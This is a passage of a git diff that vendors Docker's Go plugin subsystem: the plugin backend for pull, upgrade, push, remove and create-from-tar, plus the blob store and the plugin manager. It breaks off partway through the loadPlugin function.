types.PluginPrivileges + if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" { + privileges = append(privileges, types.PluginPrivilege{ + Name: "network", + Description: "permissions to access a network", + Value: []string{c.Network.Type}, + }) + } + for _, mount := range c.Mounts { + if mount.Source != nil { + privileges = append(privileges, types.PluginPrivilege{ + Name: "mount", + Description: "host path to mount", + Value: []string{*mount.Source}, + }) + } + } + for _, device := range c.Linux.Devices { + if device.Path != nil { + privileges = append(privileges, types.PluginPrivilege{ + Name: "device", + Description: "host device to access", + Value: []string{*device.Path}, + }) + } + } + if c.Linux.AllowAllDevices { + privileges = append(privileges, types.PluginPrivilege{ + Name: "allow-all-devices", + Description: "allow 'rwm' access to all devices", + Value: []string{"true"}, + }) + } + if len(c.Linux.Capabilities) > 0 { + privileges = append(privileges, types.PluginPrivilege{ + Name: "capabilities", + Description: "list of additional capabilities required", + Value: c.Linux.Capabilities, + }) + } + + return privileges, nil +} + +// Privileges pulls a plugin config and computes the privileges required to install it. +func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) { + // create image store instance + cs := &tempConfigStore{} + + // DownloadManager not defined because only pulling configuration. 
+ pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: func(string, string, string) {}, + ImageStore: cs, + }, + Schema2Types: distribution.PluginTypes, + } + + if err := pm.pull(ctx, ref, pluginPullConfig, nil); err != nil { + return nil, err + } + + if cs.config == nil { + return nil, errors.New("no configuration pulled") + } + var config types.PluginConfig + if err := json.Unmarshal(cs.config, &config); err != nil { + return nil, err + } + + return computePrivileges(config) +} + +// Upgrade upgrades a plugin +func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return errors.Wrap(err, "plugin must be installed before upgrading") + } + + if p.IsEnabled() { + return fmt.Errorf("plugin must be disabled before upgrading") + } + + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + // revalidate because Pull is public + nameref, err := reference.ParseNamed(name) + if err != nil { + return errors.Wrapf(err, "failed to parse %q", name) + } + name = reference.WithDefaultTag(nameref).String() + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + + dm := &downloadManager{ + tmpDir: tmpRootFSDir, + blobStore: pm.blobStore, + } + + pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: dm, + }, + DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead + Schema2Types: distribution.PluginTypes, + } + + err = pm.pull(ctx, ref, pluginPullConfig, 
outStream) + if err != nil { + go pm.GC() + return err + } + + if err := pm.upgradePlugin(p, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges); err != nil { + return err + } + p.PluginObj.PluginReference = ref.String() + return nil +} + +// Pull pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + // revalidate because Pull is public + nameref, err := reference.ParseNamed(name) + if err != nil { + return errors.Wrapf(err, "failed to parse %q", name) + } + name = reference.WithDefaultTag(nameref).String() + + if err := pm.config.Store.validateName(name); err != nil { + return err + } + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + + dm := &downloadManager{ + tmpDir: tmpRootFSDir, + blobStore: pm.blobStore, + } + + pluginPullConfig := &distribution.ImagePullConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + RegistryService: pm.config.RegistryService, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: dm, + }, + DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead + Schema2Types: distribution.PluginTypes, + } + + err = pm.pull(ctx, ref, pluginPullConfig, outStream) + if err != nil { + go pm.GC() + return err + } + + p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges) + if err != nil { + return err + } + p.PluginObj.PluginReference = ref.String() + + return nil +} + +// List displays the list of plugins and associated metadata. 
+func (pm *Manager) List() ([]types.Plugin, error) { + plugins := pm.config.Store.GetAll() + out := make([]types.Plugin, 0, len(plugins)) + for _, p := range plugins { + out = append(out, p.PluginObj) + } + return out, nil +} + +// Push pushes a plugin to the store. +func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, outStream io.Writer) error { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return err + } + + ref, err := reference.ParseNamed(p.Name()) + if err != nil { + return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name()) + } + + var po progress.Output + if outStream != nil { + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + defer func() { + close(progressChan) + <-writesDone + }() + + var cancelFunc context.CancelFunc + ctx, cancelFunc = context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + po = progress.ChanOutput(progressChan) + } else { + po = progress.DiscardOutput() + } + + // TODO: replace these with manager + is := &pluginConfigStore{ + pm: pm, + plugin: p, + } + ls := &pluginLayerProvider{ + pm: pm, + plugin: p, + } + rs := &pluginReference{ + name: ref, + pluginID: p.Config, + } + + uploadManager := xfer.NewLayerUploadManager(3) + + imagePushConfig := &distribution.ImagePushConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + ProgressOutput: po, + RegistryService: pm.config.RegistryService, + ReferenceStore: rs, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: is, + RequireSchema2: true, + }, + ConfigMediaType: schema2.MediaTypePluginConfig, + LayerStore: ls, + UploadManager: uploadManager, + } + + return distribution.Push(ctx, ref, imagePushConfig) +} + +type 
pluginReference struct { + name reference.Named + pluginID digest.Digest +} + +func (r *pluginReference) References(id digest.Digest) []reference.Named { + if r.pluginID != id { + return nil + } + return []reference.Named{r.name} +} + +func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Association { + return []reference.Association{ + { + Ref: r.name, + ID: r.pluginID, + }, + } +} + +func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) { + if r.name.String() != ref.String() { + return digest.Digest(""), reference.ErrDoesNotExist + } + return r.pluginID, nil +} + +func (r *pluginReference) AddTag(ref reference.Named, id digest.Digest, force bool) error { + // Read only, ignore + return nil +} +func (r *pluginReference) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + // Read only, ignore + return nil +} +func (r *pluginReference) Delete(ref reference.Named) (bool, error) { + // Read only, ignore + return false, nil +} + +type pluginConfigStore struct { + pm *Manager + plugin *v2.Plugin +} + +func (s *pluginConfigStore) Put([]byte) (digest.Digest, error) { + return digest.Digest(""), errors.New("cannot store config on push") +} + +func (s *pluginConfigStore) Get(d digest.Digest) ([]byte, error) { + if s.plugin.Config != d { + return nil, errors.New("plugin not found") + } + rwc, err := s.pm.blobStore.Get(d) + if err != nil { + return nil, err + } + defer rwc.Close() + return ioutil.ReadAll(rwc) +} + +func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} + +type pluginLayerProvider struct { + pm *Manager + plugin *v2.Plugin +} + +func (p *pluginLayerProvider) Get(id layer.ChainID) (distribution.PushLayer, error) { + rootFS := rootFSFromPlugin(p.plugin.PluginObj.Config.Rootfs) + var i int + for i = 1; i <= len(rootFS.DiffIDs); i++ { + if layer.CreateChainID(rootFS.DiffIDs[:i]) == id { + break + } + } + if i > len(rootFS.DiffIDs) { + return 
nil, errors.New("layer not found") + } + return &pluginLayer{ + pm: p.pm, + diffIDs: rootFS.DiffIDs[:i], + blobs: p.plugin.Blobsums[:i], + }, nil +} + +type pluginLayer struct { + pm *Manager + diffIDs []layer.DiffID + blobs []digest.Digest +} + +func (l *pluginLayer) ChainID() layer.ChainID { + return layer.CreateChainID(l.diffIDs) +} + +func (l *pluginLayer) DiffID() layer.DiffID { + return l.diffIDs[len(l.diffIDs)-1] +} + +func (l *pluginLayer) Parent() distribution.PushLayer { + if len(l.diffIDs) == 1 { + return nil + } + return &pluginLayer{ + pm: l.pm, + diffIDs: l.diffIDs[:len(l.diffIDs)-1], + blobs: l.blobs[:len(l.diffIDs)-1], + } +} + +func (l *pluginLayer) Open() (io.ReadCloser, error) { + return l.pm.blobStore.Get(l.blobs[len(l.diffIDs)-1]) +} + +func (l *pluginLayer) Size() (int64, error) { + return l.pm.blobStore.Size(l.blobs[len(l.diffIDs)-1]) +} + +func (l *pluginLayer) MediaType() string { + return schema2.MediaTypeLayer +} + +func (l *pluginLayer) Release() { + // Nothing needs to be release, no references held +} + +// Remove deletes plugin's root directory. 
+func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { + p, err := pm.config.Store.GetV2Plugin(name) + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if err != nil { + return err + } + + if !config.ForceRemove { + if p.GetRefCount() > 0 { + return fmt.Errorf("plugin %s is in use", p.Name()) + } + if p.IsEnabled() { + return fmt.Errorf("plugin %s is enabled", p.Name()) + } + } + + if p.IsEnabled() { + if err := pm.disable(p, c); err != nil { + logrus.Errorf("failed to disable plugin '%s': %s", p.Name(), err) + } + } + + defer func() { + go pm.GC() + }() + + id := p.GetID() + pm.config.Store.Remove(p) + pluginDir := filepath.Join(pm.config.Root, id) + if err := recursiveUnmount(pm.config.Root); err != nil { + logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err) + } + if err := os.RemoveAll(pluginDir); err != nil { + logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err) + } + pm.config.LogPluginEvent(id, name, "remove") + return nil +} + +func getMounts(root string) ([]string, error) { + infos, err := mount.GetMounts() + if err != nil { + return nil, errors.Wrap(err, "failed to read mount table while performing recursive unmount") + } + + var mounts []string + for _, m := range infos { + if strings.HasPrefix(m.Mountpoint, root) { + mounts = append(mounts, m.Mountpoint) + } + } + + return mounts, nil +} + +func recursiveUnmount(root string) error { + mounts, err := getMounts(root) + if err != nil { + return err + } + + // sort in reverse-lexicographic order so the root mount will always be last + sort.Sort(sort.Reverse(sort.StringSlice(mounts))) + + for i, m := range mounts { + if err := mount.Unmount(m); err != nil { + if i == len(mounts)-1 { + return errors.Wrapf(err, "error performing recursive unmount on %s", root) + } + logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount") + } + } + + return nil +} + +// Set sets plugin args +func (pm *Manager) Set(name string, args []string) 
error { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return err + } + if err := p.Set(args); err != nil { + return err + } + return pm.save(p) +} + +// CreateFromContext creates a plugin from the given pluginDir which contains +// both the rootfs and the config.json and a repoName with optional tag. +func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) (err error) { + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + ref, err := reference.ParseNamed(options.RepoName) + if err != nil { + return errors.Wrapf(err, "failed to parse reference %v", options.RepoName) + } + if _, ok := ref.(reference.Canonical); ok { + return errors.Errorf("canonical references are not permitted") + } + taggedRef := reference.WithDefaultTag(ref) + name := taggedRef.String() + + if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin() + return err + } + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + if err != nil { + return errors.Wrap(err, "failed to create temp directory") + } + var configJSON []byte + rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON) + + rootFSBlob, err := pm.blobStore.New() + if err != nil { + return err + } + defer rootFSBlob.Close() + gzw := gzip.NewWriter(rootFSBlob) + layerDigester := digest.Canonical.New() + rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash())) + + if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil { + return err + } + if err := rootFS.Close(); err != nil { + return err + } + + if configJSON == nil { + return errors.New("config not found") + } + + if err := gzw.Close(); err != nil { + return errors.Wrap(err, "error closing gzip writer") + } + + var config types.PluginConfig + if err := json.Unmarshal(configJSON, &config); err != nil { + return errors.Wrap(err, "failed to parse config") + } + + if err := 
pm.validateConfig(config); err != nil { + return err + } + + pm.mu.Lock() + defer pm.mu.Unlock() + + rootFSBlobsum, err := rootFSBlob.Commit() + if err != nil { + return err + } + defer func() { + if err != nil { + go pm.GC() + } + }() + + config.Rootfs = &types.PluginConfigRootfs{ + Type: "layers", + DiffIds: []string{layerDigester.Digest().String()}, + } + + configBlob, err := pm.blobStore.New() + if err != nil { + return err + } + defer configBlob.Close() + if err := json.NewEncoder(configBlob).Encode(config); err != nil { + return errors.Wrap(err, "error encoding json config") + } + configBlobsum, err := configBlob.Commit() + if err != nil { + return err + } + + p, err := pm.createPlugin(name, configBlobsum, []digest.Digest{rootFSBlobsum}, tmpRootFSDir, nil) + if err != nil { + return err + } + p.PluginObj.PluginReference = taggedRef.String() + + pm.config.LogPluginEvent(p.PluginObj.ID, name, "create") + + return nil +} + +func (pm *Manager) validateConfig(config types.PluginConfig) error { + return nil // TODO: +} + +func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser { + pr, pw := io.Pipe() + go func() { + tarReader := tar.NewReader(in) + tarWriter := tar.NewWriter(pw) + defer in.Close() + + hasRootFS := false + + for { + hdr, err := tarReader.Next() + if err == io.EOF { + if !hasRootFS { + pw.CloseWithError(errors.Wrap(err, "no rootfs found")) + return + } + // Signals end of archive. 
+ tarWriter.Close() + pw.Close() + return + } + if err != nil { + pw.CloseWithError(errors.Wrap(err, "failed to read from tar")) + return + } + + content := io.Reader(tarReader) + name := path.Clean(hdr.Name) + if path.IsAbs(name) { + name = name[1:] + } + if name == configFileName { + dt, err := ioutil.ReadAll(content) + if err != nil { + pw.CloseWithError(errors.Wrapf(err, "failed to read %s", configFileName)) + return + } + *config = dt + } + if parts := strings.Split(name, "/"); len(parts) != 0 && parts[0] == rootFSFileName { + hdr.Name = path.Clean(path.Join(parts[1:]...)) + if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(strings.ToLower(hdr.Linkname), rootFSFileName+"/") { + hdr.Linkname = hdr.Linkname[len(rootFSFileName)+1:] + } + if err := tarWriter.WriteHeader(hdr); err != nil { + pw.CloseWithError(errors.Wrap(err, "error writing tar header")) + return + } + if _, err := pools.Copy(tarWriter, content); err != nil { + pw.CloseWithError(errors.Wrap(err, "error copying tar data")) + return + } + hasRootFS = true + } else { + io.Copy(ioutil.Discard, content) + } + } + }() + return pr +} diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go new file mode 100644 index 0000000000..66e6dab9e8 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go @@ -0,0 +1,71 @@ +// +build !linux + +package plugin + +import ( + "errors" + "io" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +var errNotSupported = errors.New("plugins are not supported on this platform") + +// Disable deactivates a plugin, which implies that they cannot be used by containers. +func (pm *Manager) Disable(name string, config *types.PluginDisableConfig) error { + return errNotSupported +} + +// Enable activates a plugin, which implies that they are ready to be used by containers. 
+func (pm *Manager) Enable(name string, config *types.PluginEnableConfig) error { + return errNotSupported +} + +// Inspect examines a plugin config +func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) { + return nil, errNotSupported +} + +// Privileges pulls a plugin config and computes the privileges required to install it. +func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) { + return nil, errNotSupported +} + +// Pull pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error { + return errNotSupported +} + +// Upgrade pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) error { + return errNotSupported +} + +// List displays the list of plugins and associated metadata. +func (pm *Manager) List() ([]types.Plugin, error) { + return nil, errNotSupported +} + +// Push pushes a plugin to the store. +func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, out io.Writer) error { + return errNotSupported +} + +// Remove deletes plugin's root directory. +func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { + return errNotSupported +} + +// Set sets plugin args +func (pm *Manager) Set(name string, args []string) error { + return errNotSupported +} + +// CreateFromContext creates a plugin from the given pluginDir which contains +// both the rootfs and the config.json and a repoName with optional tag. 
+func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) error { + return errNotSupported +} diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go new file mode 100644 index 0000000000..dc9e598e04 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/blobstore.go @@ -0,0 +1,181 @@ +package plugin + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/progress" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +type blobstore interface { + New() (WriteCommitCloser, error) + Get(dgst digest.Digest) (io.ReadCloser, error) + Size(dgst digest.Digest) (int64, error) +} + +type basicBlobStore struct { + path string +} + +func newBasicBlobStore(p string) (*basicBlobStore, error) { + tmpdir := filepath.Join(p, "tmp") + if err := os.MkdirAll(tmpdir, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", p) + } + return &basicBlobStore{path: p}, nil +} + +func (b *basicBlobStore) New() (WriteCommitCloser, error) { + f, err := ioutil.TempFile(filepath.Join(b.path, "tmp"), ".insertion") + if err != nil { + return nil, errors.Wrap(err, "failed to create temp file") + } + return newInsertion(f), nil +} + +func (b *basicBlobStore) Get(dgst digest.Digest) (io.ReadCloser, error) { + return os.Open(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex())) +} + +func (b *basicBlobStore) Size(dgst digest.Digest) (int64, error) { + stat, err := os.Stat(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex())) + if err != nil { + return 0, err + } + return stat.Size(), nil +} + +func (b *basicBlobStore) gc(whitelist map[digest.Digest]struct{}) { + for _, alg := 
range []string{string(digest.Canonical)} { + items, err := ioutil.ReadDir(filepath.Join(b.path, alg)) + if err != nil { + continue + } + for _, fi := range items { + if _, exists := whitelist[digest.Digest(alg+":"+fi.Name())]; !exists { + p := filepath.Join(b.path, alg, fi.Name()) + err := os.RemoveAll(p) + logrus.Debugf("cleaned up blob %v: %v", p, err) + } + } + } + +} + +// WriteCommitCloser defines object that can be committed to blobstore. +type WriteCommitCloser interface { + io.WriteCloser + Commit() (digest.Digest, error) +} + +type insertion struct { + io.Writer + f *os.File + digester digest.Digester + closed bool +} + +func newInsertion(tempFile *os.File) *insertion { + digester := digest.Canonical.New() + return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())} +} + +func (i *insertion) Commit() (digest.Digest, error) { + p := i.f.Name() + d := filepath.Join(filepath.Join(p, "../../")) + i.f.Sync() + defer os.RemoveAll(p) + if err := i.f.Close(); err != nil { + return "", err + } + i.closed = true + dgst := i.digester.Digest() + if err := os.MkdirAll(filepath.Join(d, string(dgst.Algorithm())), 0700); err != nil { + return "", errors.Wrapf(err, "failed to mkdir %v", d) + } + if err := os.Rename(p, filepath.Join(d, string(dgst.Algorithm()), dgst.Hex())); err != nil { + return "", errors.Wrapf(err, "failed to rename %v", p) + } + return dgst, nil +} + +func (i *insertion) Close() error { + if i.closed { + return nil + } + defer os.RemoveAll(i.f.Name()) + return i.f.Close() +} + +type downloadManager struct { + blobStore blobstore + tmpDir string + blobs []digest.Digest + configDigest digest.Digest +} + +func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { + for _, l := range layers { + b, err := dm.blobStore.New() + if err != nil { + return initialRootFS, nil, err + } + defer 
b.Close() + rc, _, err := l.Download(ctx, progressOutput) + if err != nil { + return initialRootFS, nil, errors.Wrap(err, "failed to download") + } + defer rc.Close() + r := io.TeeReader(rc, b) + inflatedLayerData, err := archive.DecompressStream(r) + if err != nil { + return initialRootFS, nil, err + } + digester := digest.Canonical.New() + if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { + return initialRootFS, nil, err + } + initialRootFS.Append(layer.DiffID(digester.Digest())) + d, err := b.Commit() + if err != nil { + return initialRootFS, nil, err + } + dm.blobs = append(dm.blobs, d) + } + return initialRootFS, nil, nil +} + +func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) { + b, err := dm.blobStore.New() + if err != nil { + return "", err + } + defer b.Close() + n, err := b.Write(dt) + if err != nil { + return "", err + } + if n != len(dt) { + return "", io.ErrShortWrite + } + d, err := b.Commit() + dm.configDigest = d + return d, err +} + +func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) { + return nil, digest.ErrDigestNotFound +} +func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go new file mode 100644 index 0000000000..927f639166 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/defs.go @@ -0,0 +1,26 @@ +package plugin + +import ( + "sync" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin/v2" +) + +// Store manages the plugin inventory in memory and on-disk +type Store struct { + sync.RWMutex + plugins map[string]*v2.Plugin + /* handlers are necessary for transition path of legacy plugins + * to the new model. 
Legacy plugins use Handle() for registering an + * activation callback.*/ + handlers map[string][]func(string, *plugins.Client) +} + +// NewStore creates a Store. +func NewStore(libRoot string) *Store { + return &Store{ + plugins: make(map[string]*v2.Plugin), + handlers: make(map[string][]func(string, *plugins.Client)), + } +} diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go new file mode 100644 index 0000000000..f260aa61a7 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager.go @@ -0,0 +1,347 @@ +package plugin + +import ( + "encoding/json" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "regexp" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +const configFileName = "config.json" +const rootFSFileName = "rootfs" + +var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`) + +func (pm *Manager) restorePlugin(p *v2.Plugin) error { + if p.IsEnabled() { + return pm.restore(p) + } + return nil +} + +type eventLogger func(id, name, action string) + +// ManagerConfig defines configuration needed to start new manager. +type ManagerConfig struct { + Store *Store // remove + Executor libcontainerd.Remote + RegistryService registry.Service + LiveRestoreEnabled bool // TODO: remove + LogPluginEvent eventLogger + Root string + ExecRoot string +} + +// Manager controls the plugin subsystem. 
+type Manager struct { + config ManagerConfig + mu sync.RWMutex // protects cMap + muGC sync.RWMutex // protects blobstore deletions + cMap map[*v2.Plugin]*controller + containerdClient libcontainerd.Client + blobStore *basicBlobStore +} + +// controller represents the manager's control on a plugin. +type controller struct { + restart bool + exitChan chan bool + timeoutInSecs int +} + +// pluginRegistryService ensures that all resolved repositories +// are of the plugin class. +type pluginRegistryService struct { + registry.Service +} + +func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { + repoInfo, err = s.Service.ResolveRepository(name) + if repoInfo != nil { + repoInfo.Class = "plugin" + } + return +} + +// NewManager returns a new plugin manager. +func NewManager(config ManagerConfig) (*Manager, error) { + if config.RegistryService != nil { + config.RegistryService = pluginRegistryService{config.RegistryService} + } + manager := &Manager{ + config: config, + } + if err := os.MkdirAll(manager.config.Root, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root) + } + if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot) + } + if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir()) + } + var err error + manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct + if err != nil { + return nil, errors.Wrap(err, "failed to create containerd client") + } + manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs")) + if err != nil { + return nil, err + } + + manager.cMap = make(map[*v2.Plugin]*controller) + if err := manager.reload(); err != nil { + return nil, errors.Wrap(err, "failed to restore plugins") + } + return 
manager, nil +} + +func (pm *Manager) tmpDir() string { + return filepath.Join(pm.config.Root, "tmp") +} + +// StateChanged updates plugin internals using libcontainerd events. +func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error { + logrus.Debugf("plugin state changed %s %#v", id, e) + + switch e.State { + case libcontainerd.StateExit: + p, err := pm.config.Store.GetV2Plugin(id) + if err != nil { + return err + } + + pm.mu.RLock() + c := pm.cMap[p] + + if c.exitChan != nil { + close(c.exitChan) + } + restart := c.restart + pm.mu.RUnlock() + + os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)) + + if p.PropagatedMount != "" { + if err := mount.Unmount(p.PropagatedMount); err != nil { + logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) + } + propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + if err := mount.Unmount(propRoot); err != nil { + logrus.Warn("Could not unmount %s: %v", propRoot, err) + } + } + + if restart { + pm.enable(p, c, true) + } + } + + return nil +} + +func (pm *Manager) reload() error { // todo: restore + dir, err := ioutil.ReadDir(pm.config.Root) + if err != nil { + return errors.Wrapf(err, "failed to read %v", pm.config.Root) + } + plugins := make(map[string]*v2.Plugin) + for _, v := range dir { + if validFullID.MatchString(v.Name()) { + p, err := pm.loadPlugin(v.Name()) + if err != nil { + return err + } + plugins[p.GetID()] = p + } + } + + pm.config.Store.SetAll(plugins) + + var wg sync.WaitGroup + wg.Add(len(plugins)) + for _, p := range plugins { + c := &controller{} // todo: remove this + pm.cMap[p] = c + go func(p *v2.Plugin) { + defer wg.Done() + if err := pm.restorePlugin(p); err != nil { + logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err) + return + } + + if p.Rootfs != "" { + p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") + } + + // We should only enable rootfs propagation for certain plugin types that need it. 
+ for _, typ := range p.PluginObj.Config.Interface.Types { + if (typ.Capability == "volumedriver" || typ.Capability == "graphdriver") && typ.Prefix == "docker" && strings.HasPrefix(typ.Version, "1.") { + if p.PluginObj.Config.PropagatedMount != "" { + propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + + // check if we need to migrate an older propagated mount from before + // these mounts were stored outside the plugin rootfs + if _, err := os.Stat(propRoot); os.IsNotExist(err) { + if _, err := os.Stat(p.PropagatedMount); err == nil { + // make sure nothing is mounted here + // don't care about errors + mount.Unmount(p.PropagatedMount) + if err := os.Rename(p.PropagatedMount, propRoot); err != nil { + logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage") + } + if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { + logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage") + } + } + } + + if err := os.MkdirAll(propRoot, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) + } + // TODO: sanitize PropagatedMount and prevent breakout + p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err) + return + } + } + } + } + + pm.save(p) + requiresManualRestore := !pm.config.LiveRestoreEnabled && p.IsEnabled() + + if requiresManualRestore { + // if liveRestore is not enabled, the plugin will be stopped now so we should enable it + if err := pm.enable(p, c, true); err != nil { + logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err) + } + } + }(p) + } + wg.Wait() + return nil +} + +func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) { + p := filepath.Join(pm.config.Root, id, configFileName) + dt, err := 
